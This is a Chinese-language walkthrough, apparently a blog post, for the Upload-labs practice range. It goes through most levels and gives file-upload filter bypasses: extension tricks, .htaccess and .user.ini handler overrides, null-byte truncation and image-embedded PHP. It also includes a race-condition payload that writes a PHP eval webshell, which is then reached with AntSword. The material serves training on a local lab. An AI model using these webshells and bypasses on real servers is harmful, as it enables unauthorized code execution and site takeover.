Upload-labs 1-21关 靶场通关攻略

Pass-1

1、将一个php文件重命名为jpg文件

2、上传1.jpg抓包,将后改为php,放行

上传成功

3、右键,在新标签页打开图像,即可查看上传的木马

Pass-2

1、与第一关步骤一样,可参考第一关

Pass-3

1、将文件名修改为1.php5

2、上传后右键,在新标签页打开图像

3、使用蚁剑连接

Pass-4

1、创建一个.htaccess文件,里面输入内容<FilesMatch "1.jpg">

SetHandler application/x-httpd-php</FilesMatch>

2、先上传.htaccess文件,再上传1.jpg,图片右键新建标签页打开图片

Pass-5

1、创建一个.user.ini文件,输入内容auto_prepend_file = "1.jpg"

2、先上传.user,ini文件,再上传1.jpg,访问 http://127.0.0.1/upload/upload/readme.php

Pass-6

1、将1.php改为1.phP

2、上传后右键,在新标签页打开图像

Pass-7

1、上传1.php抓包,将1.php后面加空格,放行

2、上传成功,点击右键在新标签页打开图像

Pass-8

步骤一:上传1.php抓包,将1.php后面加.  放行

2、右键,在新标签页打开图像

Pass-9

1、上传1.php抓包,将1.php后面加::$DATA,放行

上传后点击右键,发现页面403

将后缀::$DATA去掉即可

Pass-10

1上传1.php文件抓包,1.php后面加.空格. 放行

2、上传后右键,在新标签页打开图像

Pass-11

1、将1.php改为1.pphphp

2、上传1.pphphp文件,图片右键新建标签页打开图片

Pass-12

1、上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行

2、图片右键新建标签页打开图片,删掉�/9320240830163621.jpg访问

Pass-13

1、上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg

2、打开Hex,将6.php后面的空格对应的20改为00,放行

3、图片右键新建标签页打开图片,删掉�/5320240830164829.jpg访问

Pass-14

1、将一张图片和一个php文件放在cmd根目录,运行copy a.jpg/b+1.php/a shell.jpg

2、上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

Pass-15

1、上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

Pass-16

环境问题,无法进行测试

Pass-17

1、图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

2、复制地址去蚁剑连接

Pass-18

1、php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

2、上传文件,burp抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;

3、访问1.php抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;

4、同时攻击,直到出现webshell.php

5、访问webshell.php,使用蚁剑连接

Pass-20

1、上传php文件,保存名称改为1.php/.

2、图片右键新建标签页打开图片

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值